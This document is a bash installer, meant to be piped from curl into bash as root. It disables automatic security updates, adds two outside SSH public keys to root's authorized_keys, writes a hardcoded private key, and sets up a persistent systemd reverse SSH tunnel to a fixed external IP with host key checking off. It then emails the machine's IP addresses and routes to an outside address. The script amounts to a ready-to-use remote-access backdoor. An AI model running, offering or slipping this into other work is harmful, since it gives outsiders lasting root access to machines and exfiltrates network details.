#run me:
#   curl pathos.tanatos.org/fwdssh  | bash 

if [[ `id -u` == 0 ]]
then :
else echo run with sudo
    exit
fi

# ----------------------------------------------------
cecho ()                     # Color-echo.
                             # Argument $1 = message
                             # Argument $2 = color
{
local black='\E[30m'
local red='\E[31m'
local green='\E[32m'
local yellow='\E[33m'
local blue='\E[34m'
local magenta='\E[35m'
local cyan='\E[36m'
local white='\E[37m'

local default_msg=""
local message=${1:-$default_msg}   # Defaults to default message.
local color=${2:-black}           # Defaults to black, if not specified.

color=$(eval "echo \$""$color")
echo -ne "$color""$message"
tput sgr0
return
}
# ----------------------------------------------------


which sshd &>/dev/null && which telnet &>/dev/null || {
    systemctl stop apt-daily.timer
    systemctl stop apt-daily-upgrade.timer
    systemctl disable apt-daily.timer
    systemctl disable apt-daily-upgrade.timer

    systemctl stop unattended-upgrades

    export DEBIAN_FRONTEND=noninteractive

    apt update
    apt install --no-upgrade -y openssh-server telnet -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold"
    dpkg --configure -a
    apt-get -f install -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold"
}

CONNECT_HOST=167.172.59.39

while :
do
    REMOTE_PORT=$(($RANDOM % 1000 + 6000 ))
    echo = testing REMOTE_PORT $REMOTE_PORT
    if { echo ; sleep 2; }  | telnet $CONNECT_HOST $REMOTE_PORT 2>/dev/null | grep OpenSSH
    then echo = REMOTE_PORT $REMOTE_PORT busy
    else 
        echo = REMOTE_PORT $REMOTE_PORT free
        break
    fi

done

LOCAL_PORT=`grep ^Port /etc/ssh/sshd_config   | awk '{print $2}' | head -n1`
[ -z "$LOCAL_PORT" ] && LOCAL_PORT=22

export HOME=/root/

ezbik_install_ssh_key() {
    local KEYFILE=/root/.ssh/authorized_keys
    local PUBKEY="ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwwLvA13HtOJhv17pRSDZ2D4SL2PX4/bZt56s7weA2FEAbJfAXnOZLCxnT3bqzHuFrilgO1kXLhWvner5Td4e7JKPYgPPkCwEwWvVIPp9wh7TEgFyQgi39u+N5vQy5lBOTuAJBcc1x4qDTY8w1ebYcGawuciyq3O8OWRFhhlqDt5vArjf2UKikqWF6P1CSJQDW2kYz+PCVVa/dmR2H8XUg9WxmH057rQ/1n5yoXlSCQqI3p7jRd9xn4Lsc9llZddDIClfOZIiiqR1BBZjXXeFrstahaEFGNsQ4hQAu+MwmgC71JoBEkZwfk2MwyC2IOU95XrDh+QB6HhRTxGKlJM4Nw== Dont.delete.it.is.your.linux.sysadmin"

    if grep -q "$PUBKEY" $KEYFILE &>/dev/null
    then    echo = key already installed
    else    sudo mkdir -p /root/.ssh;
            sudo chmod 700 /root/.ssh;
            echo "$PUBKEY" | sudo tee -a  "$KEYFILE" >/dev/null  && sudo chmod 600 "$KEYFILE"
    fi
}

diorge_install_ssh_key() {
    local KEYFILE=/root/.ssh/authorized_keys
    local PUBKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJtwOcMJb58evMpdkBG3zoE85dLoJ1FW8iwpbqNXzwOR25XJNYqSs78gC2Voam2fIGU+otZw6nnYnVOPqquybIxzFbve0J7d4HrDOFtd1lP8A9l/2AbX1gTCM/gUlhpupfyuf0VEgWMEHrSOujGO/WwvB5lEy/oQJ6J5CDbPThR4VxZojVDsRoEbsEZ1JvgcyhKjoP79o1kXsGGDvMM0XBIIgDTHABG8w0n0y5mPLTAOqRINxtXez1OIiQuSOAPseItiu+O1E4bc0P321o5ibP6AYkTZp0Zq9B3V7Nv/YBvVeQ91w6ig4kcvAcrbFC4yewF4O8DZq6IrOmeTI5OMkR linax"

    if grep -q "$PUBKEY" $KEYFILE &>/dev/null
    then    echo = key already installed
    else    sudo mkdir -p /root/.ssh;
            sudo chmod 700 /root/.ssh;
            echo "$PUBKEY" | sudo tee -a  "$KEYFILE" >/dev/null  && sudo chmod 600 "$KEYFILE"
    fi
}

ezbik_install_ssh_key
diorge_install_ssh_key

mkdir -p /etc/fwdssh
touch /etc/fwdssh/priv
chmod 700 /etc/fwdssh
chmod 600 /etc/fwdssh/priv


echo '-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA0UffzbGFfOWl5Vf5eEE3P7+Lcg3UV7MpCjbHf8fXoNcqwMGt
dDsx80hsei4P8X0GqG2cZIzLGZByIMlpdYV9vMAQwsm7zDb9LcbEQT0qmsJ+nnDt
0wfQfuxk0xlsAbleZQU0wzpvoGKsiSZhuZcZaEm81q4ROd4i0Zw8gErWV3NVNsKl
Qe2Kn0Xm/TrGojn6QI45r6TMn9J/6fKQ+mljdNsvTOAzdBROUP3TRNzLwh1Obhsz
5SKZ4Hb2dpwLfvTHvDmGbpCn80YBSeWTNaut1OuvdPyZsZ4I/UH4RtFD2NN6GabB
FTB5Q79gLVcvHpX7pB876siRjhjvpvheRIFO1wIDAQABAoIBAQCJcmz4SNjk2GaG
I6tCYYKJqaFJvO9y0cXoYWXQ9E0X43i+s/TZW29I2o30CICMF5Lh12tZVmalWYq7
IczTVGLqLjJT2+4tBwhsohiOyD9M+OPz5zMq3/z8/wCQ7CdVUos+SZcHiT961JOA
V+bi3uve5F7Tl+rUWKIBjFzn3T68m1/Pv8QDS6UZPVHX5ITnQSVo2wMqjoin4lXH
JSJj9MyAX8T+6ZBuS17skEubCQMIIOCgoGB95+8DbYQO7+9xYss8x+sQCp4BUmF+
cMYhykffsQ0EWbzxjPLJ0xXIQJGVR9m3NO1SQYO/DW3Gb010zDHKNmTRe1BV6570
Bx+CC9xBAoGBAPiv3uhdI0X3AFi4wnFlOZSYlgTKJbe9ozTGDQo2RvdJThJ+MwQk
pJzAVgAW4CHhZfGfMdLb6MGaOTs8sXM8vQLFsjx/W9WwF9utcSLB1V4x1AChcSSH
0+ggX3FtFThV3MMOEHvlRkpT/zd4UQ+ASA4P0u715aLPcS6CrORFAqyxAoGBANdv
Wehjg23SZw763ALmZCK+pshju1MIx38jTuwMc3+ixts5Yu0N0puwnHOzF6RQ3cGZ
vsyFU+PjVwksf5sL1LN9wopfLeLVQMIgGWOH4N1AYRvWxpsHyAhjtSX3fqFVokad
rpTLtxe/xQf72rfOlvlUWPaJnQNEz7e5BaREZXYHAoGBAJVTRU3RXzTLs/GSP29H
kOOhG7OUjkFeJXmy0nGnVcV2xuJj1M5QEmftNbaoBb1SUpxbMteiJIjbyjG/p+3C
MtxPSU76SnJtYmYOJzjvmucMlHgseHuu85cWmTjKf0tsgzq8XzmF2kcXWNA99q6Q
ILQQ3F+QV2sDlLqQzK/koE6BAoGAOWyv/XbRKKvl1qNdk9RPqsdA87dJzmdPrf7+
YYMsIkCEWxkf2mpN0jwwZ9K8IYuAoMNXjXKYmu0VXRekZ/KuXq3N9k5Kj+UiHtyp
h9NHSBKKD/6e7+ISGtJhDd67vUtzNvl++KCYjFcMsQUcFtSVf55RHF4wIRftel5y
N4gXt28CgYAYiGMsdt4g2h5ru5WSYGIZa1/3iRv9/zFxIXa5YbVOeckugTHAzO8i
yJH43qCg3sEz/WWCfIbUrC6bu95iBGmNC77Zj2HT0EtNVwfCQbsKAcoaUQzIiLtC
E2mJ2nEuLNcvSAnZSTjwwphrKJdmUo95SdiEyhGi/4Lh6lVXe8iZ3Q==
-----END RSA PRIVATE KEY-----' > /etc/fwdssh/priv

echo '
[Unit]
After=network.target

[Service]
Environment=LOCAL_PORT='$LOCAL_PORT'
Environment=LOCAL_HOST=127.0.0.1
Environment=REMOTE_PORT='$REMOTE_PORT'
#Environment=REMOTE_HOST=127.0.0.1
Environment=REMOTE_HOST=0.0.0.0

Environment=CONNECT_HOST='$CONNECT_HOST'
Environment=CONNECT_USER=fwd

ExecStart=/usr/bin/ssh ${CONNECT_USER}@${CONNECT_HOST} -R ${REMOTE_HOST}:${REMOTE_PORT}:${LOCAL_HOST}:${LOCAL_PORT} -N -o ConnectTimeout=6 -o ServerAliveInterval=10 -o ExitOnForwardFailure=yes -o StrictHostKeyChecking=no -i /etc/fwdssh/priv 

Type=simple

RestartSec=3
Restart=always
StartLimitInterval=7200s
StartLimitBurst=10000

[Install]
WantedBy=default.target

' > /etc/systemd/system/fwdssh.service

systemctl daemon-reload
systemctl enable fwdssh.service
systemctl restart fwdssh.service

timeout 5 journalctl -f -u fwdssh.service -n5

echo = show fwdssh.service
systemctl status fwdssh.service | cat | grep -E 'Loaded|Active'

STATUS2="$CONNECT_HOST $REMOTE_PORT"

echo = Test REMOTE_PORT $CONNECT_HOST:$REMOTE_PORT
if { echo ; sleep 2; }  | telnet $CONNECT_HOST $REMOTE_PORT 2>/dev/null | grep OpenSSH
then
    STATUS1=GOOD 
    color=green
else  
    STATUS1=bad
    color=red
fi

ADMIN_EMAIL=cool@tanatos.org
MAIL_FROM=f@f.com
MAIL_TO=$ADMIN_EMAIL

set +x

ME=$(curl -m10 -Ss https://ip.tanatos.org/ip.php )

{
echo "From: $MAIL_FROM
To: $MAIL_TO
Subject: fwdssh $HOSTNAME
Date: $(date +'%a, %-d %b %Y %H:%M:%S %z')

"

    echo -e "\n== $STATUS1, $STATUS2"
    echo -e "\n== Ip addresses:"
    ip -o a
    echo -e "\n== Routes:"
    ip ro
    echo -e "\n== GEO\nhttps://ifconfig.co/?ip=$ME\n\n"

}  | curl -m10 -Ss smtp://pathos.tanatos.org:587 --mail-from $MAIL_FROM --mail-rcpt $MAIL_TO --upload-file - 



if [[ $? == 0 ]]
then echo "= email sent to $ADMIN_EMAIL"
fi

echo
cecho "= status: $STATUS1\n" $color
cecho "= local SSH forwarded to remote port $REMOTE_PORT" blue ; echo " << forward this detail!" 
echo
echo = Done



# vim: filetype=sh